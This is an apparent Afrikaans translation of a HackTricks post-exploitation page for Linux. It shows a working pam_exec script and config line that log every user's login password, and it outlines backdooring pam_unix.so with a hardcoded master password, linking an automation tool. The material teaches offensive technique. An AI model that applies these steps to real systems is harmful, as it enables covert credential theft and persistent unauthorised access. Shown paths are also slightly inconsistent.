.. | ||
pam-pluggable-authentication-modules.md | ||
README.md |
Linux Na-Exploitation
{% hint style="success" %}
Leer & oefen AWS Hack:HackTricks Opleiding AWS Red Team Expert (ARTE)
Leer & oefen GCP Hack: HackTricks Opleiding GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kontroleer die inskrywingsplanne!
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.
Sniffing Aanteken Wagwoorde met PAM
Laat ons 'n PAM-module konfigureer om elke wagwoord wat elke gebruiker gebruik om in te teken, te registreer. As jy nie weet wat PAM is nie, kyk:
{% content-ref url="pam-pluggable-authentication-modules.md" %} pam-pluggable-authentication-modules.md {% endcontent-ref %}
Vir verdere besonderhede, kyk na die oorspronklike pos. Dit is net 'n opsomming:
Tegniek Oorsig: Pluggable Authentication Modules (PAM) bied buigsaamheid in die bestuur van outentifikasie op Unix-gebaseerde stelsels. Hulle kan die sekuriteit verbeter deur die aanpassing van die aanmeldingsproses, maar hulle kan ook risiko's inhou as dit verkeerd gebruik word. Hierdie opsomming skets 'n tegniek om aanmeldingskredensiale met PAM vas te vang, tesame met maatreëls vir verligting.
Vaslegging van Kredensiale:
- 'n bash-skrip met die naam
toomanysecrets.sh
word geskep om aanmeldingspogings te registreer, waar die datum, gebruikersnaam ($PAM_USER
), wagwoord (via stdin), en afgeleë gasheer IP ($PAM_RHOST
) na/var/log/toomanysecrets.log
vasgelê word. - Die skrip word uitvoerbaar gemaak en geïntegreer in die PAM-konfigurasie (
common-auth
) deur diepam_exec.so
-module te gebruik met opsies om stil te hardloop en die outentiseringsleutel aan die skrip bloot te stel. - Die benadering demonstreer hoe 'n gekompromitteerde Linux-gasheer uitgebuit kan word om kredensiale stiekem te registreer.
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh
Backdooring PAM
Vir verdere besonderhede, kyk na die oorspronklike pos. Hierdie is net 'n opsomming:
Die Pluggable Authentication Module (PAM) is 'n stelsel wat onder Linux gebruik word vir gebruikersverifikasie. Dit werk op drie hoofkonsepte: gebruikersnaam, wagwoord, en diens. Konfigurasie lêers vir elke diens is geleë in die /etc/pam.d/
gids, waar gedeelde biblioteke verifikasie hanteer.
Doel: Wysig PAM om verifikasie met 'n spesifieke wagwoord moontlik te maak, deur die werklike gebruikerswagwoord te omseil. Dit fokus veral op die pam_unix.so
gedeelde biblioteek wat deur die common-auth
lêer gebruik word, wat deur byna alle dienste vir wagwoordverifikasie ingesluit word.
Stappe vir die Wysiging van pam_unix.so
:
- Vind die Verifikasie Direktief in die
common-auth
lêer:
- Die lyn verantwoordelik vir die kontrole van 'n gebruiker se wagwoord roep
pam_unix.so
aan.
- Wysig die Bronkode:
- Voeg 'n kondisionele verklaring by in die
pam_unix_auth.c
bronlêer wat toegang verleen as 'n voorafbepaalde wagwoord gebruik word, anders gaan dit voort met die normale verifikasieproses.
- Herstel en Vervang die gewysigde
pam_unix.so
biblioteek in die toepaslike gids. - Toetsing:
- Toegang word verleen oor verskeie dienste (aanmelding, ssh, sudo, su, skermspaarder) met die voorafbepaalde wagwoord, terwyl normale verifikasieprosesse onveranderd bly.
{% hint style="info" %} Jy kan hierdie proses outomatiseer met https://github.com/zephrax/linux-pam-backdoor {% endhint %}
{% hint style="success" %}
Leer & oefen AWS Hack: HackTricks Opleiding AWS Red Team Expert (ARTE)
Leer & oefen GCP Hack: HackTricks Opleiding GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die inskrywingsplanne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacktruuks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.